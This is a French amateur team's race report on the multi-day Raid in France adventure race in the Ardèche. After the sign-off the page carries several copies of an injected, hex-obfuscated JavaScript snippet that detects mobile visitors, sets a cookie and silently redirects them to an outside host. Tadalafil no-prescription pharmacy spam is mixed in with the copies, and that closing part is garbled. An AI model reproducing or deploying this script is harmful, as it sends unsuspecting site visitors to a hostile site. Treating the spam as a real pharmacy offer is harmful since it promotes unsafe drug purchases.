Juil
27
2017

Raid in France: le CR !

Compte-rendu de course

Équipe 14 – Défis Sports Aventures

Raid In France
Un concept unique, une aventure sportive et humaine

 

Raid in France s’impose comme l’épreuve phare de la sphère outdoor dans l’Hexagone.

Aucune course en France ne s’apparente à Raid in France, une épreuve expédition non stop et en totale autonomie. Son principe est simple: 4 coureurs (dont une fille obligatoirement) en immersion totale dans la nature pour une aventure de 5 à 8 jours sans interruption. Le parcours reste secret jusqu’au coup d’envoi de la course. Les itinéraires sont découverts en temps réel par les coureurs pendant la période de la course.

Ayant participé aux plus grandes épreuves de la planète, les organisateurs de Raid In France peuvent témoigner de la diversité du territoire français, un terrain d’aventure largement aussi dépaysant que l’Amérique du Sud, l’Afrique ou l’Océanie.

L’aventure Raid in France requiert une préparation sérieuse. Le tracé et l’organisation de la course sont connus pour être extrêmement exigeants. Au total, les équipes s’engagent pour 90 à 135 heures de sport sans interruption.

Participer à Raid in France, c’est partager des valeurs humaines, sportives et environnementales fortes et les transmettre tout au long de l’aventure.

Raid in France a été créé par Pascal Bahuaud et Bruno Vinuales, tous deux passionnés de raids aventure.

L’épreuve commence ce dimanche 4 juin à minuit mais en réalité nous sommes sur le pont dès 14h avec le briefing qui va dévoiler le circuit, les épreuves, les enchaînements et donc notre organisation pour les jours à venir.

Toute l’après-midi nous nous affairons à répartir le matériel dans les caisses dont nous disposons :

  • 1 caisse VTT par coureur
  • 1 caisse A pour le matériel d’escalade
  • 1 caisse d’assistance que nous ne verrons qu’une seule fois
  • 2 sacs étanches pour le matériel de kayak.

A 19h nous avons enfin réussi à tout faire rentrer et surtout nous respectons les poids maxi, du coup nous profitons d’aller manger un morceau à notre hôtel de la veille puis faire une courte sieste avant le début de la course !

30 minutes avant le départ nous quittons la voiture pour nous rendre vers le centre de l’organisation et c’est à ce moment qu’Éric nous fait la première frayeur … où est son casque ? …. au restaurant bien entendu …. Du coup, nous avons battu le record de temps pour y aller et encore merci à la patronne qui nous attendait pour récupérer notre bien !

De retour, c’est en combi que nous pouvons nous rendre au départ du swim-run serein et fin prêt … du moins en apparence !

Ça part vite en course d’orientation, tellement vite que Guillaume réalise, au milieu de la 1ère section nage qu’il a oublié de pointer la balise 3 à l’entrée de cette même section => demi-tour, et oui il y a une balise à chaque entrée/sortie de section de nage ! Pour le coup, nous sortons dernier de cette section mais ce n’est pas grave nous allons remonter progressivement les équipes, nous sommes partis pour 135h de course, no stress !

La transition qui suit est un peu chaotique avec beaucoup de monde sur une petite surface. Il faut se sécher pour repartir sec en VTT. Sur cette section nous ne rencontrerons pas de gros problème et nous remonterons à la 16ème place.

Au petit matin nous arrivons à la première zone de transition pour enchaîner sur un Trek canyoning.

Le rythme est correct et l’orientation relativement propre, tandis que nous progressons en compagnie de l’équipe des caribous. Mais sur la descente vers la rivière, première erreur en refusant de passer par une voie privée puis sur l’accès au canyon en oubliant de tourner à gauche. On se retrouve 200 à 300 mètres en amont du point d’entrée. Longue progression dans la rivière, la sortie doit se faire au niveau d’une balise située à une intersection ruisseau/rivière. En voilà une, pas de balise, on continue mais gros doute et on  tergiverse en compagnie de 2 autres équipes. Nous décidons de continuer bien qu’il nous semble être dans la zone dangereuse et interdite de la rivière. Bien nous en a pris, car nous tombons enfin sur la balise. La sortie du canyon n’est pas vraiment plus simple, puisqu’il faut remonter une pente très raide pleine de végétation jusqu’à atteindre la deuxième aire de transition AT2 et le départ de la première section canoë.

Nous profitons de la transition pour nous recharger en eau et en nourriture car nous partons pour 37 km de canoë et il parait qu’il n’y a pas beaucoup d’eau ! Cela va se vérifier après le passage de 3 rapides avec glissière dont une est fatale à Éric et Annick : hop à la baille ! Heureusement il fait chaud et nous sommes vite repartis. C’est après que notre chemin de croix commence ! Il faut descendre du bateau tous les 50m pour le pousser. La fin de ce parcours que nous terminons à la tombée de la nuit devient vite pénible. C’est dommage, le parcours était plutôt agréable dans les gorges de l’Eyrieux.  Nous arrivons enfin à l’AT3 mais il faut encore trainer le canoë sur 100m. C’est lors de cette transition qu’Annick en profitera pour rencontrer l’âme sœur qui fera chavirer son cœur dans l’eau !

Après une transition relativement longue nous attaquons de nuit un  VTT de 40 km. Le roadbook nous dit de rejoindre le point 180 en suivant les rubalises. Nous atteignons ce point sans les suivre après un gros portage. A partir de là on ne trouve pas le chemin, on tourne et on décide de retourner au départ pour enfin suivre les rubalises qui nous amène exactement au même endroit avec un portage identique. Dur dur surtout que l’on est toujours en plein doute sur l’orientation. Judicaël prend les choses en main et semble nous remettre dans le droit chemin. Nous avançons enfin en sachant où nous sommes. N’ayant pas dormi depuis maintenant une trentaine d’heure, Guillaume nous demande une pause. 1/4 plus tard, après un sommeil en bord de chemin nous voilà repartis. Nous atteignons enfin la première balise de cette section puis nous espérons enchainer les autres. Malheureusement cela va de mal en pis, une équipe nous double et nous, nous perdons à nouveau le nord. Nous tournons en rond et au petit matin nous parvenons à trouver cette fichue balise. Le reste s’enchaine, mais une dernière erreur nous oblige à prendre un chemin de coupe en descente inroulable. Nous ne sommes pas là où l’on devrait, nous nous recalons et rejoignons enfin le dernier CP de cette section. Nous prenons un gros coup au moral et nous décidons de prendre nos 2 premières vraies heures de sommeil sous la tente installée par les bénévoles. Résultat des courses plus de 10h de passées sur ce foutu VTT soit 2 fois plus que la plupart des équipes !!!!

Arrivée à l’AT4 pour le départ de la deuxième section canoë longue de 57 km. Descente du Rhône puis remontée de l’Ardèche. Rien de bien folichon si ce n’est un portage de canoë, d’où le transport de nos chariots dont le plus neuf a cassé au bout de 20 m. Heureusement un autochtone nous a prêté main forte mais surtout une pointe en acier (en acier la pointe, elle ne pliera pas !) pour remplacer une goupille. Nous avons ainsi pu terminer ce long et fastidieux canoë juste à la tombée de la nuit pour arriver à l’AT5.

Après une petite transition nous voilà à remonter à pied les gorges de l’Ardèche. Nous sommes dispensés d’une petite partie car nous sommes arrivés trop tard à AT5. Le chemin de nuit est très agréable malgré un problème de fuite de poche à eau pour Éric et un traitement d’ampoule à l’index pour ce même Éric.

Nous arrivons à l’entrée de la grotte, de larges salles s’ouvrent devant nous, c’est impressionnant. Nous enchainons la remontée de corde sur une vingtaine de mètres et nous voilà à rechercher les 3 balises dans les différentes galeries. Merci Guillaume d’avoir potassé les topos de spéléo ! Sortie de la grotte où nous décidons de dormir 3 heures pour éviter l’affluence à CP15. Il fallait ressortir avant 20h30 de la grotte sinon bloqué à CP15 jusqu’à 6h30 et départ toutes les 5 minutes. Du coup nous repartons tranquilles et reposés pour atteindre CP15 sans trop de problème et seuls. Nous devrons tout de même contourner une zone interdite clôturée, effectuer une coupe quelque peu hasardeuse et nous arrêter pour soigner une ampoule au pied de Guillaume.

Arrivés à CP15, nous rechargeons en eau et c’est reparti en trek pour atteindre le haut des falaises des gorges de l’Ardèche. Deux rappels de 50 et 70 m plus bas nous voici à traverser l’Ardèche à pied.

De là on joue aux montagnes russes avec encore une belle zone infranchissable dont on décide sagement de faire le tour. Il fait beau et chaud, les paysages sont magnifiques et nous atteignons l’AT6 !

On récupère nos caisses VTT, le temps de s’équiper et nous voilà en fin d’après-midi sur une section VTT qui commence par une belle bosse: ça pousse et malheureusement ça  repousse suite à une énième erreur d’orientation. On se recale et Judicaël et Guillaume mènent la barque comme il faut jusqu’à atteindre une piste que l’on espérait roulante ! Et bien non, c’est gavé de caillasses, c’est long et le sommeil pointe. Un CP salvateur puisqu’on y trouve des bonbons  et surtout du savon… Vous comprendrez bientôt son importance.

Enfin nous rejoignons l’AT7 en milieu de nuit où nous décidons de dormir 2h avant d’embarquer sur la dernière section canoë. Nous en profitons également pour effectuer une petite toilette salvatrice tant nos arrières trains nous irritent, d’où le bonheur d’avoir trouvé une petite fiole de savon. Cela a bien fait rire les bénévoles qui se demandaient ce que l’on fabriquait derrière les camions !

Section courte de canoë (13 km) que l’on commence au petit matin après avoir mis du temps à émerger, le réveil a sonné pendant 20 minutes avant qu’Éric ne l’entende. Nous partons au plus vite dans un enchaînement de petits rapides. C’est très agréable mais le canoë d’Annick et Éric semble lourd, il racle plus qu’il ne faudrait et cela devient difficile de le relancer et de le contrôler. On décide de s’arrêter pour le vider, il devait y avoir 30 litres d’eau et à peine reparti ça se remplit de nouveau. Heureusement la fin est là et nous rejoignons passablement énervés, Judicaël et Guillaume déjà secs. A cet endroit nous retrouvons le boy-friend d’Annick ainsi que d’adorables bénévoles qui nous offrent le thé.

AT8: Départ pour un trek en remontée de rivière. Le roadbook nous dit de suivre la rubalise jusqu’à une traversé de rivière. Nous perdons sa trace et n’osons passer par le camping (le chemin était pourtant là) pour emprunter un pont et nous choisissons de longer la rivière pour la traverser en amont. Éric y tombe de tout son long, ce qui fait bien rire ses compères et nous reprenons notre avancée bien difficile le long de la berge pour enfin y trouver la balise mais que de temps perdu. S’ensuit la remontée dans le lit de la rivière jusqu’à une intersection avec un canyon sec que nous remontons parmi les buis et autres plantes à épines, ça gratte et ça pique !!!

Petite pause nettoyage de pieds au col et nous voilà partis sur le deuxième tronçon de ce trek.  Une première erreur dans la redescente, grosse chaleur, recherche d’eau, gros coup de mou pour toute l’équipe et Guillaume commence à avoir des ampoules. Du coup nous ne sommes plus très lucides, nos choix d’itinéraires s’en ressentent et nous jardinons un peu avant de reprendre notre marche en avant pour déboucher à Joannas, terme de ce trek après une belle montée. Que ce fut dur. Nous prenons notre temps à l’AT9 où il fait très chaud.

Nous nous préparons pour partir sur un long VTT et dans le matériel obligatoire nous  apercevons : tentes. Mais où sont-elles ? Mierda, nous les avons laissées dans la mauvaise caisse. Tant pis on y va sans mais si contrôle il y a, nous serons bon pour une pénalité !

Nous enfourchons nos fiers destriers et nous voilà partis pour 70 km de VTT et 2300 m de dénivelé positif entrecoupé par un court trek montagne. C’est bien simple, nous devons atteindre un col donc le début n’est que montée, montée et montée. Éric tracte Annick dès que possible et 3h plus tard, au coucher du soleil nous atteignons enfin le col. Nous y croisons un couple de retraités à l’apéro étonnés de nous voir et incrédules quand on leur dit pourquoi nous sommes là. Nous n’avons plus qu’à longer les crêtes pour atteindre le CP suivant. Les paysages sont somptueux mais le vent frais et les chemins absents rendent notre progression plus lente que prévu.

Au CP nous décidons de prendre 3 heures de sommeil, il est minuit. C’est la lumière du jour qui nous réveille, il y a mal donne : aucun d’entre nous n’a entendu le réveil ! 2h30 de dodo en trop. Nous repartons dare dare et agacés sur une longue descente de piste pour remonter la vallée suivante où nous atteignons sans encombre le début du trek montagne, 4 km en semi escalade que nous avalons en 1h20. Nous repartons en méditant les conseils du contrôleur : ”il ne faut pas orienter, il faut naviguer”. Descente dans les caillasses, 2 belles chutes sans gravité, des crevaisons et une remonté mémorable: 100m de D+ droit dans la pente, portage obligatoire ! Et quand on pense atteindre la fin, supplément de 100 m de portage pour éviter 50 m de route. C’est ça l’esprit RIF mais dieu que ça fait mal !!!

La fin de la section se fait en longeant les crêtes puis en empruntant une longue et belle descente bien technique. C’est splendide mais la fatigue aidant, la fin de section est bien dure à gérer et notre progression n’est pas des meilleures. Nous arrivons enfin à AT10 en nous disant que la prochaine porte horaire va être difficile à attraper.

Il y a du monde à cette transition et nous apprenons que la porte horaire est décalée de 4h. C’est peut-être jouable mais il ne faut pas trainer. Nous décidons de tenter le coup et de ne pas prendre de repos cette nuit. Trek de 40km, porte horaire 4h du matin à CP21. Le début est bon mais très vite nous devons suivre une crête avec un soi-disant chemin qui n’est plus très pratiqué. Nous progressons lentement à travers buis et autres arbustes épineux au détriment de nos jambes et bras qui se font copieusement arracher des bouts de peau. Nous atteignons cette foutue balise mais que de temps perdu! La nuit tombe, cela ne va pas arranger les choses.

C’est reparti, Guillaume ressent à nouveau ses ampoules. Nous décidons de prendre les pistes plutôt que de couper mais erreur et nous voilà à traverser les genêts. On enchaîne, hésitation pour atteindre CP20 où on nous offre une bière. Faut y aller mais la route est longue et après avoir bien géré, la fatigue faisant son office, nous tergiversons et nous nous égarons quelque peu avant de retrouver notre route. C’est râpé pour la porte horaire, la fatigue est bien là et Annick voyant Éric tractant Guillaume marcher en dormant (tout comme Guillaume), nous décidons de prendre 1/2h de sommeil en bord de chemin qui se transforme en 1h devant
l’absence de réaction de tous aux appels au réveil de Judicaël.

Après cette courte pause nous repartons frais comme des gardons et nous atteignons CP21 à 9h. Nous allons être court-circuité et amené en voiture à AT11, départ du dernier VTT. Nous attendons les estafettes au soleil en compagnie de 3 autres équipes. Moment fort agréable avec thé et café et Guillaume en profite pour se faire soigner les pieds.

 

AT11: 20 km de VTT, 600 m de D+ mais régulier et sur une belle piste. Il est midi, on nous annonce 4h de route, la fin du Raid étant fixée à 16h on décide de tartiner un peu. Nous voilà partis sur un contre la montre par équipe, Annick tractée par Éric, Judicaël ouvrant la route. Nous atteignons le lac de Devesset en 2h30! On nous aurait menti ? Tant mieux. Reste à traverser le lac en catamaran mais devant le manque de vent nous sommes bon pour pagayer. Nous sommes accueillis par 400 Team et nous pouvons enfin fièrement franchir la ligne d’arrivée sous une douche de mousseux !

Quelle aventure ! 134h, 12000m de D+, 13h30 de dodo.

Des souvenirs plein la tête, des paysages magnifiques, des sections somptueuses, de l’abnégation, de la persévérance, du soutien, de l’entraide, des rires, des doutes, de l’agacement, de la fatigue, de la douleur, du plaisir, bref un partage magnifique entre nous !

Le retour est dur après cette parenthèse hors du temps mais un seul mot revient sur nos lèvres : On y retourne quand ????

Merci à tous de nous avoir permis de  vivre cette aventure et tout particulièrement à :

  • Ville d’Antony
  •  Avexxens
  • DSA Antony
  • Olivier Sueur
  • ACBB Triathlon
  • Nutrisens

Annick, Eric, Guillaume, Judicaël

 var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}Tadalafil Buy Online Uk No Prescription Pharmacy Uk. Men’s Health. Free Courier Delivery, Stop Smoking, Erectile Dysfunction, Discount System tadalafil buy online. Tadalafil Buy Online Uk – Great Discounts. Tadalafil relaxes muscles and increases blood flow to particular areas of the body. Tadalafil under the name of Cialis. Discount wholesale order tadalafil, online cheap canada cheapest cipla buy pill generic super no prescription usa tablets india for. Viagra samples cheapest in order tadalafil online cheap. Tadalafil no prescription. Excellent quality. Generic Tabs Online No Prescription! Save your Time and Money. Cheap Tadalafil Online Pharmacy..var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== 